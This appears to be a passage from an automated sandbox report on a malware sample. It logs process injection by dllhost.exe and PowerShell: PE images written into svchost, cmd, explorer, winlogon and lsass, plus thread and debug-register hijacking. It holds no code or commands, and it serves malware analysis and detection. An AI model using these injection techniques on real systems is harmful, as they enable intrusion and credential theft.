Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 8D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 277167A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 277167D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 22123BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 22123BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 13F081C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 13F08E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 16AA5E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 16AA5EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A7E22C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FD17760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A7E22F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FD186A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 27052A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 27052A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: unknown base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 30B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: unknown base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 34D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 2A3D0DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 28FF0B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 2A3D0F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 24D03D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21336150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 28FF0B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21350470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 196FB050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 196FB050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2A4E5670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1FFFD320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F8C8FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F8CB040000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 2580 base: 9070000 value: 4D
Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 2580 base: 9070000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 1740	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 8040
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 1244

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread register set: 1740 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 870000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 34D5B74010
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
